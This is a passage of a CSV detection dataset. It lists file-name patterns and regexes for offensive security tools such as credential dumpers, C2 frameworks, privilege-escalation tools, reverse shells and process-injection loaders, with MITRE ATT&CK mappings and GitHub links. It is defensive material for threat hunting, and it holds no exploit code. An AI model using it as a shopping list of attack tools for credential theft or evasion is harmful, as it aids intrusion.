tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\gocrack-1.0.zip*",".{0,1000}\\gocrack\-1\.0\.zip.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*\gocrack-master.*",".{0,1000}\\gocrack\-master\..{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*\GodFault.*",".{0,1000}\\GodFault\..{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*\godoh\cmd\*",".{0,1000}\\godoh\\cmd\\.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*\godoh\dnsclient\*",".{0,1000}\\godoh\\dnsclient\\.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*\godoh\dnsserver*",".{0,1000}\\godoh\\dnsserver.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*\godoh\lib\*",".{0,1000}\\godoh\\lib\\.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*\godoh\protocol\*",".{0,1000}\\godoh\\protocol\\.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*\Godpotato\*",".{0,1000}\\Godpotato\\.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*\GoFetchLog.log*",".{0,1000}\\GoFetchLog\.log.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","620","139","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "*\goldenPac.py*",".{0,1000}\\goldenPac\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\go-secdump*",".{0,1000}\\go\-secdump.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","3","279","31","2024-03-17T14:21:34Z","2023-02-23T17:02:50Z" "*\gosecretsdump*",".{0,1000}\\gosecretsdump.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*\gosecretsdump.*",".{0,1000}\\gosecretsdump\..{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*\gosecretsdump\*",".{0,1000}\\gosecretsdump\\.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*\gosecretsdump_linux*",".{0,1000}\\gosecretsdump_linux.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*\gosecretsdump_mac*",".{0,1000}\\gosecretsdump_mac.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*\gosecretsdump_win*",".{0,1000}\\gosecretsdump_win.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*\GoStompy.go*",".{0,1000}\\GoStompy\.go.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*\goWMIExec_linux_*",".{0,1000}\\goWMIExec_linux_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*\goWMIExec_mac_*",".{0,1000}\\goWMIExec_mac_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*\goWMIExec_win_*",".{0,1000}\\goWMIExec_win_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*\goZulipC2*",".{0,1000}\\goZulipC2.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*\GPOddity\*",".{0,1000}\\GPOddity\\.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*\gpp_autologin.py*",".{0,1000}\\gpp_autologin\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\gpp_password.py*",".{0,1000}\\gpp_password\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\GraphLdr.x64.bin*",".{0,1000}\\GraphLdr\.x64\.bin.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*\GraphRunner.ps1*",".{0,1000}\\GraphRunner\.ps1.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","1","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*\GraphRunner-main*",".{0,1000}\\GraphRunner\-main.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","1","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*\GraphSpy.py*",".{0,1000}\\GraphSpy\.py.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","0","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*\GraphSpy-master*",".{0,1000}\\GraphSpy\-master.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","0","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*\GraphStrike.cna*",".{0,1000}\\GraphStrike\.cna.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*\GraphStrike.py*",".{0,1000}\\GraphStrike\.py.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*\GraphStrike-main\*",".{0,1000}\\GraphStrike\-main\\.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*\group_members.py*",".{0,1000}\\group_members\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\Group3r.exe*",".{0,1000}\\Group3r\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\Group3r.exe*",".{0,1000}\\Group3r\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\Grouper2.exe*",".{0,1000}\\Grouper2\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\Grouper2.exe*",".{0,1000}\\Grouper2\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\groupmembership.py*",".{0,1000}\\groupmembership\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\gs-netcat ",".{0,1000}\\gs\-netcat\s","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*\gs-sftp*",".{0,1000}\\gs\-sftp.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*\gtfonow.py*",".{0,1000}\\gtfonow\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*\GzipB64.exe*",".{0,1000}\\GzipB64\.exe.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*\hack.ps1*",".{0,1000}\\hack\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*\HackBrowserData*",".{0,1000}\\HackBrowserData.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","0","N/A","10","10","161","24","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" "*\Hades.exe*",".{0,1000}\\Hades\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*\hades.exe*",".{0,1000}\\hades\.exe.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*\hades-main.zip*",".{0,1000}\\hades\-main\.zip.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*\HandleHijacker.cpp*",".{0,1000}\\HandleHijacker\.cpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*\HandleHijacker.hpp*",".{0,1000}\\HandleHijacker\.hpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*\handlekatz.exe*",".{0,1000}\\handlekatz\.exe.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\handlekatz.py*",".{0,1000}\\handlekatz\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\harvest.cmb*",".{0,1000}\\harvest\.cmb.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","106","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*\hash_spider.py*",".{0,1000}\\hash_spider\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\hashview.py*",".{0,1000}\\hashview\.py.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*\HellsHall.c*",".{0,1000}\\HellsHall\.c.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*\HellsHall.exe*",".{0,1000}\\HellsHall\.exe.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*\HellsHall.h*",".{0,1000}\\HellsHall\.h.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*\heroinn_client\*",".{0,1000}\\heroinn_client\\.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*\HiddenDesktop.h*",".{0,1000}\\HiddenDesktop\.h.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*\HiddenDesktop\*",".{0,1000}\\HiddenDesktop\\.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*\HijackablePaths.cs*",".{0,1000}\\HijackablePaths\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*\HijackDLL-CreateRemoteThread.*",".{0,1000}\\HijackDLL\-CreateRemoteThread\..{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*\HijackDLL-CreateRemoteThread\*",".{0,1000}\\HijackDLL\-CreateRemoteThread\\.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*\HijackDll-Process.*",".{0,1000}\\HijackDll\-Process\..{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*\HijackDLL-Threads.*",".{0,1000}\\HijackDLL\-Threads\..{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*\hijacker_app\src\ProxyApp.exe*",".{0,1000}\\hijacker_app\\src\\ProxyApp\.exe.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 